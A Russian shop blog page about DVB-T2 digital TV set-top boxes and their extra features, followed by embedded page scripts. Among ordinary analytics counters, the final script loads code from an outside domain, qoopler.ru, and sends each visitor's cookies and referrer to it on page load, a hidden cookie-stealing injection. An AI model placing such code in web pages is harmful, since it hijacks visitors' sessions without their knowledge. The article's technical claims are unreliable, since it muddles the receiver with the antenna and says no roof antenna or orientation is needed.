Какие бывают приставки для цифрового телевидения
+7(495) 776-73-79 9:00 - 22:00 | Без выходных
  • Главная - Блог - Какие бывают приставки для цифрового телевидения

Какие бывают приставки для цифрового телевидения

Организация домашнего кинотеатра с приставкой Т2

Сегодня организовать кинотеатр на дому не составит проблем, так как в магазинах электронной техники полно домашних кинотеатров, в комплекте которых идёт телевизор на жидких кристаллах с огромной диагональю и самая продвинутая аудиосистема. Устройство для считывания информации DVD проигрыватель или Blue-ray плейер не всегда идёт в комплекте и может быть докуплено самостоятельно на свой вкус и свои технические требования. Однако домашний кинотеатр можно использовать не только для просмотра фильмов в высоком качестве, записанных на съёмном носителе. К телевизору можно подключить традиционное телевидение и все передачи смотреть на большом экране и с качественным звуком. Конечно, это при условии, что приёмник телевизионного сигнала будет работать на все 100%, чтобы телевизор мог показывать картинку с самой высокой точностью и глубиной цвета.

Какие приставки для цифрового телевидения бывают и для чего они нужны

Телевидение всего мира уже перевело на цифровой формат вещания, который традиционная антенна или спутниковая не принимает. В этом то и проблема для тех, кто всё ещё пытается смотреть телевизор имея аналоговую антенну и, услышав о цифровом ТВ, удивлённо задаются вопросом какие приставки для цифрового телевидения, если всегда использовалась антенна. На практике, приставка или по-другому ресивер цифрового телевиденья - это и есть антенна, только она принимает цифровой сигнал в формате DVB T2. В нем находится усилитель сигнала, поэтому даже слабый сигнал усиливается и становится стабильным. Это в свою очередь позволяет телевизору реализовать все свои технические возможности и воспроизводить изображение высокого качества.

Особенность ресивера Т2 заключается в том, что его нет необходимости устанавливать на крыше или поворачивать в ту сторону, откуда исходит цифровой сигнал. В его конструкции имеется миниатюрная антенна, которая и выступает в роли основного приёмника сигнала. Достаточно её подключить в антенный разъём ресивера, а его к видео входу телевизору, и система готова к работе. Таким образом, работа с приставкой цифрового телевиденья проста и остаётся только рассмотреть, какие приставки для цифрового телевидения бывают, чтобы определиться какая будет соответствовать вашим требованиям.

Разновидность ресиверов Т2

Главное преимущество ресиверов цифрового телевиденья заключается в том, что все они одинаково хорошо принимают, усиливают и передают сигнал на телевизор. Даже самые простые приставки для цифрового телевидения будут отлично работать с домашним кинотеатром и радовать высокой контрастностью изображения при условии, если они поддерживают формат DVB T2. Возникает вопрос, какие приставки для цифрового телевидения тогда ещё могут быть, если в самой простой модели уже есть всё, что необходимо. Однако различия есть, ведь более дорогие модели ресиверов могут выполнять дополнительные функции:

  • Читать с флешки. Эта функция позволит не покупать устройство считывания информации, а просто воспроизводить фильмы или другие видео материалы прямо с флеш-носителя.

  • Записывать прямой эфир на флеш-носитель. Значит, можно записывать интересные телевизионные передачи, даже не находясь дома.

  • Ставить эфир на паузу. Такая функция возможна благодаря встроенной памяти в ресивере, на которую эфир записывается после постановки на паузу. После продолжения передача воспроизводится уже с записи ресивера.

Это далеко не все функции, которые можно найти в ресиверах разных моделей, но их обзор в общих чертах показывает, какие приставки для цифрового телевидения могут быть и какие возможности они открывают.



(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter32184314 = new Ya.Metrika({ id:32184314, clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); type="text/j-avascript">(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter24167089 = new Ya.Metrika({id:24167089, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-68618183-1', 'auto'); ga('send', 'pageview'); try { var yaCounter37438800 = new Ya.Metrika({ id:37438800, clickmap:true, trackLinks:true, accurateTrackBounce:true }); } catch(e) { } (function (d, w) { var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie); if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window);